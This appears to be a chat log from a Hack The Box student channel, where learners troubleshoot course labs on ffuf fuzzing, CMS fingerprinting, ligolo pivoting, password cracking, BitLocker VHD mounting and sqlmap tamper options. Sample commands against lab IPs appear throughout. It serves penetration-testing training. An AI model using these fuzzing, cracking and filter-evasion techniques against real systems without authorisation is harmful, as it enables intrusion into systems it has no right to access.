directory > parameter determination > value bruteforcing
which module and section are you on
Brute forcing attacks
do you mean login brute forcing?
yes
ok and which section?
Brute Forcing attacks > Brute Forcing attacks
that section tells you the endpoint
source code does not have anything
yes it does
http:<IP>:<PORT>
It does only say URL not found (404 error)
Information Gathering - Web Edition > Fingerprinting
Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress
I tried everything I can think of, can I PM anyone who could guide me a little to understand how to get the CMS
you asked about real world and now you're referring to the module? so what is your question for, the real world or the module?
best to say the module/section you're on
Information Gathering - Web Edition > Fingerprinting
wanted to ask that if in the ffuf module this thing worked, why is it not working here?
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29
To get me the value of the parameter?
because the url you're using is not correct. review the python code they provide and you can see the url they use.
http://<ip>:<port>/pin?"pin"={formatted_pin} -> i am trying to fuzz "pin"
right, that's why it's not working
I'm sorry, maybe I'm wrong, I still can't follow why it's not working!!
you're fuzzing the query parameter not the value
yes thats what i want to get to!!
He's searching for "pin" as the parameter, he hasn't found that one yet ;p
exactly!!!
what does the question say?
As there was in the ffuf module we do 1.) directory fuzzing > 2.) then parameter fuzzing > 3.) the value fuzzing/bruteforcing
I am at 2nd step parameter fuzzing!! not the value
Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress
use whatweb for that
I'm trying that
more aggressive
the command doesn't change much
wanted to ask that if in the ffuf module this thing worked, why is it not working here?
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29
nothing came up!!
Idiot check on my end, can you add a :FUZZ to the end of your wordlist definition?
do you need to modify /etc/hosts ?
yes
Was my second bit of advice yeh
Wasn't a question for myself hahaha more of a "can you try this and report back" type question
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://94.237.59.16:44890/pin?FUZZ=value -fs 29
nothing came up by this as well
hi, I am currently at the Nibbles part of the Getting Started module in CPTS and I was wondering how do I install LinEnum.sh, I don't think I have done it correctly as when I start the server, it does not run the script and give an IP
doesn't really make a difference in this case
it's because the query parameter doesn't matter here, you're getting the same response size from each word in your list
again, what's that got to do with something in the real world? your question was about real world but you keep going back to the module
so in real work this will work?
are you fuzzing the right url?
yup i did get the directory using this
ffuf -u http://94.237.59.16:44890/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
(ffuf ASCII-art banner)
v2.1.0-dev
:: Method : GET
:: URL : http://94.237.59.16:44890/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 98ms]
okay
does this module instruct you to add an entry in your hosts file?
thanks so much for the helpful assistance
nope
you're welcome
ping me if you need more help
okay, have you tried filtering by size?
i did -fs 29
check you dm
your*
ffuf -w testsss -u http://94.237.59.16:44890/pin?FUZZ=value
(ffuf ASCII-art banner)
v2.1.0-dev
:: Method : GET
:: URL : http://94.237.59.16:44890/pin?FUZZ=value
:: Wordlist : FUZZ: /home/taresh/testsss
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
jshbdhbhf [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 100ms]
pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
dhbhsd [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
hsbdhb [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
ffuf can't see the difference, pin has the same status, same size
has anybody done the Corporate OSINT module? I was thinking about doing it, however it's a lot of cubes so I just wanna know what people's thoughts on the module are
i'm using ligolo and my connection dies, if I try to start_tunnel again after reconnecting the agent I get:
error: a tunnel is already using this interface name. Please use a different name using the --tun option
I can't find any way of releasing that tunnel... tunnel_stop doesn't recognize it as in use. Anyone run into this and figure out a solution?
does it show in your network interfaces? ip link show
I just remake the interface
Easy enough to create a new one I guess, I was hoping to just stop the old one instead of creating ligolo2..3..4
Delete the old one
if you know it’s gonna die then stop the tunnel first
That only happens to me sometimes tho, maybe you need a stable version
Had problems with the latest and been using 0.6.2 ever since
Thanks for asking, I shut the whole thing down so I can't check now but I'm sure it was in there. It's the start_tunnel command in the ligolo console that seems to be stuck. I'll keep an eye on downgrading to 0.6.2 as TLattice suggests just in case that's it. It might just be the janky connection I've got.
no
ligolo is a life changer, I wish they added it to the pivoting module
When you have a GET or POST you need to fuzz like 'FUZZ=key', how do you figure out that key is the right one?
Like you're also taught 'FUZZ=x' and 'FUZZ=y' in the modules
How do you know that x, y or key is correct
Curling empty post requests just says "access denied" and nothing useful.
Like if it returned "invalid parameter y="
because you filter out the bad responses
But if I start fuzzing "x=FUZZ" for get and the actual correct one is something like ?y=1 then every response will be wrong
examine the requests to find out
So I just insert random words until it does something?
sounds like it will take forever
no you can fuzz it or observe the behavior of the website with your browser or burp or something
I mean the modules tell you how to fuzz the second part of the something=something. But they don't tell you how to fuzz the first part
In the module they just give you that the correct get request is ?x=something and the correct post request is y=something
But I want to know how you get the x and y
i just told you.. fuzz it or observe it
that's what fuzzing means
I tried manually several times but the message just remains the same
which module/section/question is this about
Web Fuzzing skills assessment
Like I did
curl -d "key=" http://94.237.48.46:45074/admin/index.php
curl -d "x=" http://94.237.48.46:45074/admin/index.php
curl -d "y=" http://94.237.48.46:45074/admin/index.php
And they all returned the same access denied message
Which tells me nothing. Earlier in the module it would reply with something like "invalid parameter y=" telling me that y=fuzz is correct thing to fuzz
I haven't done this module but I know this isn't what you should be doing
yeah stick with what the module teaches
aren't you supposed to fuzz for possible parameters?
"+ 2 After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag? "
"web fuzzing" is not a module
looks like you're to compose the right url from the previous questions?
oh geez ok
lol i was looking at my notes from cpts path, that's not in it so that makes sense
so you probably need to fuzz it, not do it manually
Hi guys
I'll just run "fuzz=" with burp suite parameters wordlist and see if it does anything different
can someone recommend a good wordlist from SecLists that's good for value fuzzing
FUZZ=value
where value is unknown
make sure you're using the wordlists mentioned on that page "All fuzzing can be completed using the common.txt SecLists Wordlist, found at /usr/share/seclists/Discovery/Web-Content on Pwnbox, or via the SecLists GitHub."
@pine dune
thank you
in the cbbh exam or cpts I assume the common wordlist will be too easy for htb or am I mistaken?
it's against the rules to discuss the contents of the exam, however you can be assured everything in the exam is covered in the modules
depends on the situation presented to you
also I tried using a number wordlist from 1-1000 for username and users which I made. However, as user and username tend to be strings, is it correct to assume it SHOULD be a string and that the website wouldn't typically assign users by numbers
?
ok thanks
thank you
I'm happy the 5-second timer is removed as well, that was annoying asl
should I use the "usernames" directory?
as one of the parameters hinted towards that
its generally a small subset of use cases
at the very least the website will allow alphanumeric usernames where numbers are part of the string
yes
yea but I'm assuming a user or usernames from 1-1000 is too basic? even though this was shown to us in one of the earlier sections of the modules
I tried GET fuzzing with ?FUZZ=value and ?FUZZ = admin and POST fuzzing with FUZZ=value and FUZZ=admin and got nothing. Which is what I expected
yes
what module are you working on bro?
It could be FUZZ=ass for all I know which means every response would be wrong.
thanks
did you try visiting the page in your browser?
contextualize your wordlist with questions like "does the website enforce any specific rules for usernames?"
Yes, it's just a page that says Access Denied
have you tried that?
Web Fuzzing skills assessment
I tried using the username txt which I suggested, it didn't give any result
There are two different web fuzzing modules which are almost exactly the same, which makes things confusing
in the bug bounty path
One is called Web Fuzzing and the other is called Attacking Web Applications via FFUF
ahh yea I'm on the Attacking Web Applications via FFUF one
Oh I did that one yesterday
alri
I think there might even be a third web fuzzing module because when you search google for help there's people talking about a http://fuzzing-fun.htb
probably related in one of the modules somewhere
i'm on the medium machine at the end of Footprinting and i'm curious as to how some of you keep track of the various branches you're led down as you're working with one set of credentials, then find another and maybe don't exhaust the first user before digging through the second?
Sigh, there's another page that ffuf just didn't find. I hate when this happens. I waste like an hour trying to do something on one page because ffuf failed to find the correct page in the initial scan.
it's annoying fr
@cloud urchin @lusty thicket I tried the common.txt and also the username.txt and no results
any ideas?
Last night I wasted 2 hours cause gobuster didn't find a subdomain it was supposed to. The correct word was even in the wordlist, but it just didn't find it.
Happened to someone else here too at the same time
something similar happened to me with the Password Attacks module
I think it's a problem either with the tool or HTB
@green minnow
I've started running every scan 3 times now
you'll surely get a hit with the 10mil wordlist file
nah that's not what you're supposed to do. index.php is a red herring. There's another page that ffuf should have found but didn't
where can I find that?
write it down
user1:password123
progress: didnt check permissions
next step: digging deeper into the system
etc
in the same dir
@pine dune what question are you stuck on?
that's what I said
ahh ok thanks
the last one 😅
I'll have a look what I did yesterday
thanks again man
Yeah I couldn't see anything wrong with your previous commands, just probably a wordlist issue.
I wouldn't hate when this happens, as I will generally have some takeaways from things like this, i.e., is there something I can do differently or was it truly an issue with the tool, etc. I don't recall having any issues using ffuf on this skills assessment.
yea it was the wordlist
I dunno but last night we had 2 examples in here of gobuster failing to find a subdomain that was included in the wordlist
😎
And that is still not a bad thing (I mean it is when you spend hours trying to get it work, but I just move to a different tool if it isn't working). Annotate what didn't work and if you know why, include the why. Maybe down the road you can circle back and mess with it some more and figure out why it didn't work correctly or you can decide that it just isn't a tool you wish to use any longer.
I guess if you have lots of study time it can be useful. But I don't, I have about 2 hours a night after work. So if I get 2 hours of wasted time that's a bummer.
but works with curl?
Nah I get that, pick your battles and use the 2 is one, 1 is none mentality.
sorry about that 😅 spoiler
bro stop spoiling
sorry smh I was just about to remove the param sorry again
how can I ask the question?
Yeah, please stop spoiling.
If it involves specifics, go to DMs with anyone that can help
There are obviously differences.. find what they are
ok ty
Should there be something over at fuzzing_(redacted).htb I just get "unable to connect" in browser
But it does reply to pings
Are you talking about that web fuzzing skills assessment?
yes
You can DM what you are seeing and attempting.
why sometimes the IP address just cannot spawn
hello, I am still practicing Linux Fundamentals but I won't get past the kernel version information as I get an incorrect response every time I try to answer, please help me out
so you got a shell?
of course I typed uname -v
try getting a shell in metasploit and while you background it, try out the suggester module
okay I shall try that, thanks
wayback machine for hackthebox doesn't seem to be working
this opens when i click that snap
it works... HTB isn't an American company, use their .eu address
ahhhhh finally, after grinding for 3 months 8-12 hours daily, I completed the path, it feels so good
DACL Attacks I - Skill Assessment
Find the credentials to connect via RDP to WS01 and submit the flag in the Administrator's desktop as the answer. Use port 13389 to connect to WS01.
the IP from the spawned target points to DC01 (10.129.205.122), not WS01, and there is no route to WS01 (172.17.17.10). How am I meant to do this question?
i have the credentials of WS01 from ||laps||
I'm having an issue with Attacking Common Services' FTP machine.
It seems there is no FTP port running, I tried several times but no luck. Any help?
are you using the right port?
nothing is showing in nmap, I even tried to enumerate ||2121|| specifically
I'm stuck on Living Off the Land
last question
Active Directory Enumeration & Attacks ---Living Off the Land
Thoughts on taking the exam? Feel confident?
I’m more curious how you feel now compared to 3-4 modules in at the beginning (where I’m at).
take it step by step, each module is important. The path doesn't work in a way that the first modules are easy and the last ones are hard, no, each module introduces you to new stuff which is hard in its own way. Take good notes, don't just solve questions and move on, try to experiment with the various techniques shown in each section, and don't think about the next modules, there's a module at the end, the AEN, that will test everything you know
You have to use port 13389 on the DC
hello guys, i am having some troubles doing the protected archives section on password attacks module
I am using the john2zip command to generate the file with the hash, but when i use john with rockyou and the generated file it says that 0 hashes has been cracked
What am i doing wrong? Ty
You are supposed to use the provided resources
it doesn't work anyway, I tried using the default password list and even mutating the original password but nothing works
ok I resolved it, ty for the hint brother
yeah this worked thanks, just found it really strange that 13389 on DC01 was reverse port forwarded to 3389 on WS01
I should've read the instructions more closely
hello there! i need help on Documentation & Reporting Practice Lab. DM me (Y)
hello, I need help on the Attacking Passwords easy lab, if you can DM me
has anybody done the Corporate OSINT module? I was thinking about doing it, however it's a lot of cubes so I just wanna know what people's thoughts on the module are
injection attacks
skill assessment
question: "should my payload work" I'll dm it to you, to avoid spoilers
phase of internal access
@analog dock could i dm you 
For?
gm
Password Attacks skill assessment hard
There is a vhd file which i got and cracked the password of that file
I don't know how to proceed
Sorry, I'm stuck at 「Procedures, Intro to Assembly Language」
I have taken a look at this url (https://forum.hackthebox.com/t/address-on-top-of-the-stack-while-debugging-question-from-procedures-intro-to-assembly-language/253179/1)
And I tried all my answers (401014, 401046 etc...)
All failed
Can anyone help me?
VHD is a Virtual Hard Disk. You can mount it
https://itsfoss.com/mount-encrypted-windows-partition-linux/
Solved
I tried mounting it
https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0
with the help of this blog, I'm not able to do it
Accessing content from Windows BitLocker encrypted partition in a vhd file on Linux
ok ill try this thanks
If you have a Windows VM, you can also mount it there.
Yea it's explained in the module, just now saw that
I'm on Footprinting Lab - Medium, well past where you find user: sa and password. I've been on this thing for two hours bouncing around and finally gave in. How would anyone guess to use Administrator in place of sa? Is that something one would know to try with just more experience or did I miss a clue somewhere?
Slight logic leap, assume a level of password reuse
Hey folks, someone around for a quick question regarding AEN module?
I don’t follow ☹️
Assume passwords are reused
Well the module itself is a guide if you really need it
Again maybe I missed a step or a clue somewhere. Just not sure why I would’ve thought to take the username I found (sa) and replace it with Administrator. Is that a known thing to do in the industry?
Yeah, but I don't get it what I'm doing wrong in the vhost enumeration ...
Google what SA relates to in mssql
Revisit the web enum module then. There's multiple ways to get info, I also suggest doing it blind
Thank you. Lesson learned
Thanks, I've mistyped the domain, what an idiot I am ... 😌
Hello.
I have sat for several days with the Skills Assessment for SQLMap Essentials.
I've tried every possible solution I can think of. At first I sat for a long time without success, but I managed to get the database, but just as I was about to drop the flag, the target died. After that nothing has worked at all to get into the db. But the other day something strange happened, sqlmap spat out a db but it was "Cubrid", I'm pretty sure it must be mysql, since that's what was shown when I ran manual tests. This db looked completely distorted (see picture). I don't know what to do, I'm running out of suggestions for solutions.
A friend who works in Red Team said that it could possibly be that there is something wrong with the box or that there are many users and the dbs get destroyed or something. Can someone point me in the right direction? What actually worked when I captured the database that time was: ||tamper=space2comment,randomcase,between,apostrophemask --random-agent --batch --no-cast||
Please can someone help me and give me a clue?
im going forward, now i can inject.. i let you know if i need help
while fuzzing I get these lines in ffuf, I'm not sure these are relevant and helpful, is there a way to filter only usable info?
you can use the -ic parameter to "ignore comments". These # lines are comments in the wordlist and often get detected as real urls due to the # having a special meaning in urls
okay thanks
Something must have been wrong with the Skills Assessment target on SQLMap Essentials, as I said it took several days to access the database, caught it one day but the target went down and I have tested for several days and nothing has worked, now suddenly it works even with the same command that worked the first time..
I dont remember the skill assessment, but there are two things to be aware of: first, there are parameters for the command that tell sqlmap to try methods that are more rare (using --level and --risk), the default option may not catch the needed method.
Second: Time-based SQL attacks rely heavily on a steady connection. If your connection to the VM is bad then it might not detect time-based attacks correctly. And even if the connection is fine and it detected a time-based attack, extracting information via time-based attacks takes a long time. I would advise trying all the other attack methods first before looking for time-based ones. Especially because sqlmap will stop once it finds an attack vector, even if a different one might also exist and might be much faster in execution. If I remember correctly sqlmap by default does not check time-based attacks last
Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.
I finished thanks !!! just wondering, is the admin hash not crackable?
Yeah, that's my issue too
I'm not sure, but I don't think so.
is there a time limit for non-sub users for Pwnbox, like only 2 hr/day or not
Exploit the target and find the hostname of the router in the devicedetails directory at the root of the file system.
So I'm in the machine with rconfig_vendors_auth_file_upload_rce and when I'm trying to get to the root folder I just get a no permission error
Shells & Payloads
Infiltrating Unix/Linux
One spawn/day, unless you buy cubes or a sub